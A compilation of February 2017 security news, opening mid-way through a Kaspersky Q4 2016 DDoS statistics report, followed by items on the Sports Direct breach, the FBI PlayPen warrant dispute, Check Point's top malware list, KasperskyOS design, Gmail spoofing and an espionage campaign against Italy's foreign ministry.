Altogether, the DDoS attacks we have seen so far are just a starting point initiated by various actors to draw up IoT devices into the actors’ own botnets, test drive Mirai technology and develop attack vectors. The DDoS attacks on five major Russian banks in November are a very good example of this.
First, they demonstrate once again that financial services like the bitcoin trading and blockchain platforms CoinSecure of India and BTC-e of Bulgaria, or William Hill, one of Britain’s biggest betting sites, which took days to come back to full service, were at the highest risk in the fourth quarter and are likely to remain so throughout 2017.
Second, cybercriminals have learnt to manage and launch very sophisticated, carefully planned, and constantly changing multi-vector DDoS attacks adapted to the mitigation policy and capacity of the attacked organization. As per our analysis, the cybercriminals in several other cases we tracked in 2016 started with a combination of various attack vectors gradually checking out a bank’s network and web services to find a point of service failure. Once DDoS mitigation and other countermeasures were initiated, the attack vectors changed over a period of several days.
Overall, these attacks show that the DDoS landscape entered the next stage of its evolution in 2016 with new technology, massive attack power, as well as highly skilled and professional cybercriminals. Unfortunately, this tendency has not yet found its way into the cybersecurity policies of many organizations that are still not ready or are unclear about the necessary investments in DDoS protection services.
Four main trends of the year
In 2016, the DDoS attack market saw a number of significant changes and developments. We have identified the four major trends:
The demise of amplification-type attacks. These attacks have been around for a while and the methods for combating them are well-known and have been perfected over time. They remained quite popular in the first half of 2016, but it was clear their number and volume were gradually declining. By the end of 2016, cybercriminals had almost completely given up using malicious amplification-type attacks, ending a downward trend that had lasted several years. First of all, this is the result of countermeasures being developed for these attacks. It’s also down to a reduction in the number of vulnerable amplification hosts available to the attackers (DNS Amplification attacks are the best illustration of this) as their owners react to the performance problems and losses associated with these attacks and look for ways to patch vulnerabilities.
Rising popularity of attacks on applications and the growth in their use of encryption. For the last few years UDP-based amplification attacks have remained the undisputed leader on the DDoS attack market, while attacks on applications have been relatively rare. In the second half of the year, and particularly in Q4, there was a dramatic increase in the popularity of attacks on applications, which gradually filled the niche previously occupied by amplification attacks. To organize such attacks, time-tested tools (Pandora, Drive, LOIC/HOIC) and new developments are used. Along with the growing popularity of attacks on applications, the number of these attacks using encryption is also growing. The use of encryption in most cases dramatically increases the efficiency of attacks and makes filtering them more difficult. In addition, cybercriminals continue to use an integrated approach, masking a small but effective attack on applications behind a simultaneous large-scale attack, for example, an attack involving a large number of short network packets (short-packet TCP flood).
The rise in popularity of WordPress Pingback attacks. WordPress Pingback-type attacks, which were extremely rare at the start of 2016, had by the fourth quarter occupied a substantial amount of the DDoS attack market. This is currently one of the most popular attack methods targeting applications, and we consider them separately from the overall mass of attacks at the application level. Relatively simple to organize, the “fingerprint” of these attacks is very specific, and the corresponding traffic can be easily separated from the general traffic flow. However, carrying out such an attack using encryption (something that was observed by Kaspersky Lab experts in Q4 2016) greatly complicates filtering and increases the malicious potential of this type of attack.
Use of IoT botnets to carry out DDoS attacks. After the publication of code on the GitHub resource on 24 October, Kaspersky Lab experts noticed a surge in interest in IoT devices among criminals, especially their use in botnets to perform DDoS attacks. The concepts and methods demonstrated by the creators of the Mirai botnet were used as the basis for a large number of new malicious codes and botnets consisting of IoT devices. These kinds of botnets were used in numerous attacks on Russian banks in Q4 2016. Unlike classic botnets, IoT-based botnets are huge in terms of both their volume and potential, something that was proved by the high-profile attack on the DNS DYN provider, which indirectly affected the work of many major web resources (e.g., Twitter, Airbnb, CNN and many others).
Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.
DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.
This report contains the DDoS Intelligence statistics for the fourth quarter of 2016.
In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
Q4 Summary
Resources in 80 countries (vs. 67 in Q3) were targeted by DDoS attacks in Q4 2016.
71.6% of targeted resources were located in China.
South Korea, China and the US remained leaders in terms of both the number of targets and number of detected C&C servers.
The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016.
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method decreased by 5.7 p.p., while the shares of both TCP DDoS and HTTP DDoS grew considerably.
In Q4 2016, the percentage of attacks launched from Linux botnets decreased slightly and accounted for 76.7% of all detected attacks.
Geography of attacks
In Q4 2016, the geography of DDoS attacks expanded to 80 countries, with China accounting for 76.97% (4.4 p.p. more than the previous quarter). The US (7.3%) and South Korea (7%) were once again second and third respectively.
The Top 10 most targeted countries accounted for 96.9% of all attacks. Canada (0.8%) appeared in the rating, replacing Italy. Russia (1.75%) moved from fifth to fourth thanks to a 0.6 p.p. decline in Vietnam’s share.
Distribution of DDoS attacks by country, Q3 2016 vs. Q4 2016
Statistics for the fourth quarter show that the 10 most targeted countries accounted for 96.3% of all DDoS attacks.
Distribution of unique DDoS attack targets by country, Q3 2016 vs. Q4 2016
71.6% of attacks targeted resources located in China, which was 9 p.p. more than the previous quarter. There was a small increase in the number of targets in South Korea (+0.7 p.p.). The US rounded off the top three, even though its share decreased by 9.7 p.p. (9% vs.18.7% in Q3).
The shares of the other countries in the Top 10 remained almost unchanged, with the exception of Japan which saw a fall of 1 p.p. Italy and the Netherlands left the rating and were replaced by Germany (0.56%) and Canada (0.77%).
Changes in DDoS attack numbers
The distribution of DDoS activity was relatively even throughout Q4, with the exception of a sharp peak registered on 5 November when the largest number of attacks in 2016 – 1,915 – was recorded. The quietest day of Q4 was 23 November (90 attacks). However, by 25 November cybercriminal activity had increased to 981 attacks.
Number of DDoS attacks over time* in Q4 2016
*DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.
Saturday was the busiest day of the week in Q4 for DDoS attacks (18.2% of attacks), followed by Friday 1.7 p.p. behind. Monday became the quietest day of the week for DDoS attacks (11.6%).
Distribution of DDoS attack numbers by day of the week, Q3 and Q4 2016
Types and duration of DDoS attacks
The SYN DDoS method remained the most popular: its share accounted for 75.3% of attacks, although this figure is 5.7 p.p. less than in the previous quarter. The figures for other attack types increased slightly – TCP DDoS (from 8.2% to 10.7%) and ICMP DDoS (from 1.7% to 2.2%). UDP’s contribution remained almost unchanged.
Distribution of DDoS attacks by type, Q3 and Q4 2016
Distribution of DDoS attacks by duration (hours) in Q4 2016 was distinctly uneven. While the share of attacks that lasted no more than four hours remained almost the same as the previous quarter (it decreased by just 1.56 p.p.), the figures for the other time periods changed significantly.
The share of attacks that lasted 5-9 hours increased from 14.49% to 19.28%. Attacks lasting 10-19 hours fell by 1.3 p.p., while the proportion of attacks that lasted 20-49 hours fell by even more – minus 3.35 p.p. The percentage of even longer attacks decreased considerably – the share of attacks lasting 50–99 hours accounted for 0.94%, compared to 3.46% in the previous quarter. The share of attacks that lasted 100-150 hours grew and reached 2.2%, which meant that Q4 saw twice as many of these attacks than those lasting 50-99 hours. There were very few cases of attacks lasting longer than 150 hours.
The longest DDoS attack in the fourth quarter lasted for 292 hours, 8 hours longer than the Q3 maximum. This was also the longest attack of 2016.
Distribution of DDoS attacks by duration (hours), Q3 and Q4 2016
C&C servers and botnet types
In Q4, the highest number of C&C servers (59.06%) was detected in South Korea. Although the country’s contribution increased by 13.3 p.p. from the previous quarter, it is much less than in Q2 2016 (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China (8.72%) and the US (8.39%). Their total share accounted for 76.1%, which is an increase of 8.4 p.p. compared to Q3.
In the fourth quarter, three Western European countries – the Netherlands (7.4%), the UK (1.3%), and France (1.7%) – remained in the Top 10 after entering it back in Q3. Among the newcomers to the C&C rating were Bulgaria (6%) and Japan (1.3%).
Distribution of botnet C&C servers by country in Q4 2016
When it came to the distribution of operating systems in Q4, Linux-based DDoS bots remained the clear leader, although their share decreased by 2.2 p.p., accounting for 76.7%. This correlates with the decline in popularity of SYN DDoS for which Linux bots are the most appropriate tool.
The growing popularity of IoT devices used for DDoS attacks suggests that in 2017 the balance will shift further towards Linux, since most Internet-connected devices are based on this operating system.
Correlation between attacks launched from Windows and Linux botnets, Q3 and Q4 2016
The majority of attacks – 99.7% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.3% of cases.
Conclusions and forecasts
We expect the share of amplification-type attacks in 2017 to continue to decrease, especially the most popular types (DNS, NTP). However, considering the simplicity and low organizational costs, the technique may be used in some less popular protocols suitable for amplification (RIP, SSDP, LDAP and so on), though it is unlikely that such attacks will be very effective.
The number and complexity of attacks on applications will continue to grow. Considering the renewed interest in this type of attack among cybercriminals and the stagnation in this segment over the last few years, we can assume that older botnets will gradually fall out of use and something new will appear, for example, botnets capable of more sophisticated attacks. The trend for encryption in attacks on applications will remain.
WordPress Pingback attacks will remain popular. Although in the newer versions of the WordPress CMS the vulnerability used for organizing such attacks (namely, the default Pingback function in older CMS versions) has long since been patched by the developers, there are still many vulnerable hosts on the Internet. Of course, their number will decline over time, reducing the number and power of WordPress Pingback attacks. But the relative simplicity and low cost of organizing such attacks, as well as the possibility of using encryption, makes WordPress Pingback-type attacks attractive to unpretentious cybercriminals.
Botnets based on IoT devices will continue to grow. This is largely due to both the novelty of the IoT concept in general and exploitation of IoT devices by cybercriminals. We can assume that in the fourth quarter of 2016 we only saw the emergence of this new market segment, and in 2017 it will continue to grow and develop. The potential growth is difficult to estimate: until now IoT-device manufacturers were not particularly concerned about protecting their products. Even if we assume that all new IoT devices entering the market are perfectly protected from malicious attacks (which in itself is quite doubtful), the current volume of vulnerable IoT devices with Internet access is considerable. Just a few months after the initial appearance of the concept, attackers were able to demonstrate the use of botnets of unprecedented size and conduct attacks whose power was previously only considered possible in theory. Moreover, these devices have the potential to launch attacks of any complexity – the current trend is attacks on applications, including the use of encryption. Considering the highly effective nature and huge potential of IoT-based attacks, we can predict an increase in the number of such attacks as well as their volume and complexity in 2017.
Sports Direct hacked but it still hasn’t disclosed the breach to its staff
12.2.2017
Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
The Register confirmed that the Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
In the autumn a hacker broke into the internal systems of the company and accessed personal information of its staffers, including names, email and postal addresses, as well as phone numbers.
The attackers exploited known vulnerabilities affecting the unpatched version of the DNN platform used by the Sports Direct to host the staff portal.
According to an inside source with knowledge of the data breach, staffer data were stored in plain text. Sports Direct discovered the security breach in September, the insider claimed attacker left its number on the company’s internal website in order to be contacted by the business.
According to the El Reg, Sports Direct still has disclosed the data breach to the staff, the company filed an incident report with the Information Commissioner’s Office after it became aware of the intrusion.
“A spokesperson for the ICO confirmed to The Register that it was “aware of an incident from 2016 involving Sports Direct” and would be “be making enquiries.”” reported The Register.
“Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.” the Unite assistant general secretary Steve Turner told The Register.
“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,”
“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”
Which is the reply from Sports Direct?
“We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” said the a company spokesman.
Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffeirs BigBrothers
According to Privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional,
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.
According to the court documents, the FBI monitored the Playpen bulletin board Tor hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”
The Playpen hidden service reached in one year over 200,000 users, with over 117,000 total posts mainly containing child pornography content. The law enforcement discovered nearly 1300 IP addresses belonging to the visitors.
According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, then the law enforcement managed the computer to track its visitors. The agents used the network investigative technique (NIT) to obtain the IP addresses of the Playpen users.
The Feds hacked 8,700 computers in 120 countries, based on a single warrant, a procedure considered unconstitutional by privacy advocates. The US Law enforcement has expanded its extraterritorial surveillance capabilities without the consent of the states that were hosting the computers targeted by their malware.
“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”
What if a foreign intelligence agency of law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?
Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts, filed briefs in a lawsuit involving the FBI’s Playpen investigation.
The privacy groups filed briefs in a case involving Alex Levin, who is one of the suspects in the FBI’s Playpen investigation that was identified by the Feds thanks to the NIT (Network investigative technique).
The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.
According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits such kind of search on US citizens.
““No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”
The EFF consider unconstitutional the use of a single warrant to hack in so huge number of computers across the word.
On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant, there was no other way to unclock the criminals involved in the PlayPen case.
Kelihos becomes January’s Top 10 ‘Most Wanted’ Malware
11.2.2017 securityaffeirs Virus
The infamous Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
Which are the most active malware in the wild?
According to a research conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.
The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
With great surprise, the eight-year-old malware Conficker continues to be one of the most active malware families in 2016.
In June 2016, researchers at CheckPoint described Conficker as “the most prominent family accounting for 14 percent of recognized attacks.” We remind the Conficker resurrection in 2015, when samples of the malware infected police body cameras.
Below the January’s Top 10 ‘Most Wanted’ Malware published by CheckPoint Security
Kelihos – Botnet mainly involved in bitcoin theft and spamming. It utilizes peer-to-peer communications, enabling each individual node to act as a Command & Control server
HackerDefender – User-mode Rootkit for Windows, can be used to hide files, processes and registry keys, and also implements a backdoor and port redirector that operates through TCP ports opened by existing services. This means it is not possible to find the hidden backdoor through traditional means.
Cryptowall – Ransomware that started as a Cryptolocker doppelgänger, but eventually surpassed it. After the takedown of Cryptolocker, Cryptowall became one of the most prominent ransomwares to date. Cryptowall is known for its use of AES encryption and for conducting its C&C communications over the Tor anonymous network. It is widely distributed via exploit kits, malvertising and phishing campaigns.
Conficker – Worm that allows remote operations and malware download. The infected machine is controlled by a botnet, which contacts its Command & Control server to receive instructions.
Nemucod – JavaScript or VBScript downloader which is commonly used to download ransomware variants or other malicious payloads.
RookieUA – Info Stealer designed to extract user account information such as logins and passwords and send them to a remote server.
Nivdort – Multipurpose bot, also known as Bayrob, that is used to collect passwords, modify system settings and download additional malware. It is usually spread via spam emails with the recipient address encoded in the binary, thus making each file unique.
Zeus – Banking Trojan that uses man-in-the-browser keystroke logging and form grabbing in order to steal banking information.
Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.
Necurs – Botnet used to spread malware by spam emails, mainly Ransomware and Banking Trojans.
Recently the Kelihos malware was observed spreading via infected thumb drives. The third Most Wanted malware in January was CryptoWall, a well-known ransomware, the remaining positions in the Top 10 list are occupied by other botnets mainly involved in the distribution of the dreaded Locky ransomware.
Checkpoint observed also chenges in the mobile threat landscape, the Android Triada modular backdoor remains the most advanced mobile malware on the Top 3 Most Wanted mobile threats. At the second place, there is the HummingBad, CERT-EU and other sources corroborated Check Point researchers’ findings which recently confirmed a new variant of the ad-fraud-big-money-making, HummingBad, is spreading rapidly on the Android marketplace Google Play.
HummingBad was first seen and released almost a year ago in January/February 2016 by malware authors Yingmob, and racking upwards of approx. $300,000 USD per month for the better half of 2016. Approximately 10 million Android devices were infected in the firm part of the last year.
Now, dubbed by Check Point, “HummingWhale” is at large with better ad fraud capabilities and sophisticated techniques than HummingBad affecting several applications and has been downloaded several million times from the combined list of applications downloaded.
The third mobile malware threat is Hiddad, a strain of Android malware that repackages legitimate apps and then releases them to a third-party store.
Below the Top 3 ‘Most Wanted’ mobile malware:
Triada – Modular Backdoor for Android which grants super-user privileges to downloaded malware, as helps it to get embedded into system processes. Triada has also been seen spoofing URLs loaded in the browser.
Hummingbad – Android malware that establishes a persistent rootkit on the device, installs fraudulent applications, and with slight modifications could enable additional malicious activity such as installing a key-logger, stealing credentials and bypassing encrypted email containers used by enterprises.
Hiddad – Android malware which repackages legitimate apps and then released them to a third-party store. Its main function is displaying ads, however it is also able to gain access to key security details built into the OS, allowing an attacker to obtain sensitive user data.
Features of secure OS realization
11.2.2017 Kaspersky OS
There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.
Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:
The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.
The provision of guarantees that the system will work securely and will not be compromised.
Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.
To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.
Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.
Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.
Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed based on architectural principles that can ensure its secure behavior, that meets the requirements of special-purpose systems.
However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.
If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.
For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.
Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.
This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.
The development model of the KasperskuOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.
The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.
However, access control provided by the microkernel cannot implement properties of the system related to supporting specific security policies. KasperskyOS implements the principle of separating access-related decisions based on the policy defined from access control implemented at the microkernel level. Access decisions based on computing security policy compliance verdicts are made by a dedicated component – the security server. Flask is the best known architecture based on this principle.
It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.
KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.
The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.
As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).
The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.
The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).
Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).
However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.
KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.
The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.
This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched, will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose IS can inherit the security properties of the host OS.
KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.
To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.
Gmail Delivers Spoofed Messages Without Warning, Researchers Find
11.2.2017 securityweek Security
Spoofed emails could easily land in user’s Gmail inboxes without even warning them of suspicious activity, security researchers have discovered.
While spam is normally used to deliver malicious documents or links to unsuspecting users, spoofed emails have a bigger chance of luring potential victims, because they are likely to click on a link or open a document coming from what they believe is a trusted contact. When it comes to spoofed messages, the sender is impersonated or changed to another, thus making messages appear legitimate.
Which users may expect Gmail to warn them of such suspicious activity, researchers at the Morphus Segurança da Informação recently discovered that this doesn’t always happen. According to them, users should revise the trust they have on Gmail blocking messages with spoofed senders, even when no alert is displayed regarding the legitimacy of that message.
“We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or cybercriminal,” Renato Marinho, Director at Morphus Segurança da Informação, explains.
Marinho explains that the Simple Mail Transfer Protocol (SMTP) defines the “mail envelop and its parameters, such as the message sender and recipient,” and not the message content and headers. Thus, a SMTP transaction includes Mail From (establishes the return address in case of failure), Rcpt to (the recipient address), and Data (a command for the SMTP server to receive the content of the message).
The value “From” displayed in the email is usually equivalent to the value used in the SMTP command “mail from” but, because it is part of the message content, “can be freely specified by the system or person issuing commands to the SMTP server.” Basically, an attacker simply needs to change the “From” to a desired value to spoof the sender, but that is almost certainly going to trigger anti-spam or anti-phishing mechanisms, Marinho explains.
However, attackers could also attempt to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command as well, a practice that can be combated by applying spoofing protection mechanisms. Among them, SPF (Sender Policy Framework) allows admins to specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of their domain.
To verify if these protections are effective, the security researchers decided to test the spoofing of Gmail and Yahoo addresses. They discovered that, if the SMTP server’s IP address wasn’t allowed in the SPF policy of their generic domain, the message wouldn’t be delivered. When a SPF policy was in place, however, the message was delivered in Gmail, albeit Yahoo continued to block it.
Even more surprising, the researcher says, was that the message landed in the Inbox folder, and not in Spam. Further, there was almost no indication that the message wasn’t legitimate, except for a “via [the generic domain]” mention near the sender’s address. This mention, however, appears only in the web interface, but isn’t displayed in the Android or iOS applications.
After successfully spoofing messages between @gmail.com accounts, the researchers attempted to apply the strategy to corporative domains hosted by Google. They discovered not only that the messages were delivered without a warning, but that the spoofed account profile picture was also delivered (which could easily add a sense of legitimacy to the message).
“During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exists on Gmail user base. In this situation, unlike the successful scenarios, Gmail forwarded the message to Spam folder and adds a special security alert informing that they could not verify if the message was really sent by gmail.com,” the researcher explains.
To stay protected, users are advised to pay attention to messages in their inbox coming from “@gmail.com” via another server, because they should normally be delivered by Gmail. They should also have a look at the message details, which ware available in the web application, by clicking on the “down-arrow” near “to me”. However, a spoofed message is more likely to be noticed if the full header is examined.
The researchers contacted Google Security team to report the findings, but the bug won’t be tracked as a security issue, it seems. “Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account,” Marinho says.
Russia suspected over cyber espionage campaign on the Italian foreign ministry
11.2.2017 securityaffairs Cyber
Italian officials speculate Russia was behind a cyber espionage campaign on the Italian foreign ministry that lasted for months.
The Italian Foreign Ministry was the victim of a targeted cyber espionage campaign, according to The Guardian newspaper who cited a diplomatic source that has spoken on condition of anonymity.
According to the source, the attack was launched by a nation-state actor, likely Russia.
“Russia is suspected by Italian officials of being behind a sustained hacking attack against the Italian foreign ministry last year that compromised email communications and lasted for many months before it was detected, according to people familiar with the matter.” reported The Guardian.
The source revealed that after the experts discovered the attack, the foreign ministry has introduced further security measures to improve its online “architecture” and the internal security. At the time I was writing there is no technical information about the attack neither the way the experts discovered the intrusion.
The hackers targeted the foreign ministry’s “field offices”, including embassies and staff members, they used a malware to spy on their systems and exfiltrate sensitive information.
“The official did not confirm that Moscow was behind the attack. But two other people with knowledge of the attack said the Russian state was believed to have been behind it. The hacking is now the subject of an inquiry by the chief prosecutor in Rome.” continued The Guardian.
“There were no attacks on the encrypted level. So the information – delicate, sensitive information – that is usually shared in this net, which is restricted by code, has never been attacked or part of this attack,” the government official said.
Security experts believe that the Russian Government is conducting a wide-range espionage activity in order to gather intelligence information on EU states and NATO members, the list of victims includes France, Germany, the Netherlands and Bulgaria,
Recently France the Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warns of hacking campaigns launched by Russian hackers on the upcoming elections.
Back to the present, the Italian source, who has close ties to the Foreign Ministry, confirmed that the cyber espionage campaign “did not affect the encrypted information system used to exchange the most sensitive information” but did affect “email accounts of ministry employees and the embassies”.
An Italian government official confirmed that the cyber attack occurred during last spring when Paolo Gentiloni who was serving as foreign minister, and the campaign lasted for more than four months. The official added that the hackers but did not infiltrate the encrypted system used for classified communications neither the Gentiloni’s account.
Italian foreign ministry hacked
Paolo Gentiloni, the Italian prime minister who was serving as foreign minister at the time, was not affected by the cyber attack. It is very strange the version provided by the Italian official who explained that Gentiloni avoided using email while he was foreign minister.
If true, which was the channel used by the Prime Minister Gentiloni? Why he avoided using the Government email that is monitored by the Government IT staff?
The Russia’s foreign ministry denied the involvement in the attack and said there were “no facts to prove this claim.”
I fear that also other nation-state actors may have breached our systems, Chinese hackers, North Korean Cyber army and Iranian hackers are other actors that have to be monitored carefully.
Kelihos Becomes King of the Malware Mountain
11.2.2017 securityweek Virus
The beginning of 2017 has brought a series of changes on the malware charts, as the Kelihos botnet managed to climb to the top position, while the Conficker worm dropped to fourth on the list.
An eight-year old threat, Conficker managed to remain one of the most active malware families out there last yearl, although it didn’t make it to the headlines as often as other threats. In 2015, however, the malware returned to focus briefly, after security researchers found that it had infected police body cameras.
